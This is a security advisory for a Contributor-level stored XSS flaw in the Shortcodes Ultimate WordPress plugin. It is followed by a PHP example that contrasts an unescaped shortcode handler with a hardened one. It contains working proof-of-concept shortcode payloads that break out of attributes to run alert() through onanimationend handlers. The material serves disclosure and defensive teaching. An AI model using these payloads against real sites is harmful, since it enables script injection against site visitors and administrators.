WPEX-ID: 7F5659BD-50C3-4725-95F4-CF88812ACF1C
Source: wpexploit
Published: Aug 23, 2021

Shortcodes Ultimate < 5.10.2 - Contributor+ Stored XSS

Date: 2021-08-23 00:00:00
Author: apple502j

EPSS: 0.001 (Low), percentile 24.9%

The plugin allows users with the Contributor role to perform stored XSS via shortcode attributes. Note: the plugin is inconsistent in its handling of shortcode attributes; some are escaped, most are not, and some attributes are insecure by design (such as the onclick attribute of [su_button]).

[su_accordion class='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(1)']
[su_animate duration='1s;animation-name:twentytwentyone-close-button-transition;' type='" onanimationend="alert(2)']
[su_audio width='1;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(3)//' url="a"]
[su_box color='red;animation-name:twentytwentyone-close-button-transition" onanimationend="alert(4)//']
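The root cause described above is attribute values landing in HTML without escaping or validation. The following is an added example, not code from the Shortcodes Ultimate plugin, showing a hypothetical shortcode handler in its unsafe form beside a hardened one. The handler name, the attribute set and the stand-in definitions of esc_attr() and shortcode_atts() are assumptions made so the file runs under plain php for demonstration; inside WordPress the real functions are used.

```php
<?php
// Added example (not the plugin's code). Stand-ins for two WordPress helpers so
// this file runs outside WordPress; they are simplified versions of the real ones.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    }
}
if (!function_exists('shortcode_atts')) {
    function shortcode_atts(array $defaults, $atts) {
        return array_merge($defaults, array_intersect_key((array) $atts, $defaults));
    }
}

// Unsafe pattern: user-supplied attributes are concatenated straight into markup.
// A value containing a double quote closes the attribute and can add new ones.
function render_box_vulnerable(array $atts): string {
    $a = shortcode_atts(['color' => 'red', 'class' => ''], $atts);
    return '<div class="' . $a['class'] . '" style="color:' . $a['color'] . '">box</div>';
}

// Hardened pattern: validate values against the grammar they are supposed to have,
// then escape with esc_attr() before placing them in an attribute. Validation
// stops CSS injection inside style=""; escaping stops breaking out of the attribute.
function render_box_hardened(array $atts): string {
    $a = shortcode_atts(['color' => 'red', 'class' => ''], $atts);
    // Accept only a #hex value or a bare CSS colour keyword; otherwise use the default.
    $color = preg_match('/^(#[0-9a-fA-F]{3,8}|[a-zA-Z]+)$/', $a['color']) ? $a['color'] : 'red';
    // Keep only characters valid in a class list (WordPress offers sanitize_html_class()
    // for single class names; this is the same idea for a space-separated list).
    $class = preg_replace('/[^A-Za-z0-9 _-]/', '', $a['class']);
    return '<div class="' . esc_attr($class) . '" style="color:' . esc_attr($color) . '">box</div>';
}

// Constructed input shaped like the [su_box] attribute shown above.
$atts = ['color' => 'red;animation-name:x" onanimationend="alert(4)//'];
echo render_box_vulnerable($atts), PHP_EOL; // style attribute is closed and an event handler attribute appears
echo render_box_hardened($atts), PHP_EOL;   // colour fails validation and falls back to "red"; no breakout
```

Running the file prints the two renderings side by side; the hardened output contains no attribute the handler did not intend to emit, whatever the input.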
